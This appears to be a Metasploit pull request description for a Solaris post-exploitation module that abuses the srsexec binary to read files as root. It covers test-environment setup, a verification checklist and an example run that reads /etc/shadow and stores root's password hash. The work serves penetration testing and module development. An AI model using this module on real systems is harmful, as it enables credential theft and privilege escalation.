rapid7/metasploit-framework
# srsexec Solaris Post module

To create a good environment:
1. Install NetConnect or download my "i have nothing to go off of but one post on stackoverflow" emulator: https://github.com/h00die/MSF-Testing-Scripts/blob/master/srsexec
2. Put it in the right folders with the right permissions and include argparse (PITA since SSL is busted in solaris 10u9).  See comments in the python module for more info

To verify:

- [ ] Configure/install the vulnerable software or the emulator script i wrote
- [ ] Get a user shell
- [ ] ```use modules/post/solaris/escalate/srsexec_readline```
- [ ] ```set session [#]```
- [ ] Check docs are spelled gooderers
- [ ] If you leave `/etc/shadow` as the file, check `creds` to ensure the password hash was added.

Example run:
```
msf5 post(solaris/escalate/srsexec_readline) > run

[+] 3.2.4 is vulnerable
[+] Output: verify_binary(wsltw)
srsexec: binary_name: wsltw
srsexec: name_buf: wsltw_______________
binaries file line: root:MW7h.vpI1Kq1g:1
binaries file line: :17599::::::
smmsp:NP
Security verification failed for binary: wsltw
see SYSLOG(/var/adm/messages) for errors
[+] Adding root's hash added to credential database.
[*] Post module execution completed
msf5 post(solaris/escalate/srsexec_readline) > creds
Credentials
===========

host  origin        service  public  private        realm  private_type
----  ------        -------  ------  -------        -----  ------------
      192.168.2.32           root    MW7h.vpI1Kq1g         Nonreplayable hash

```
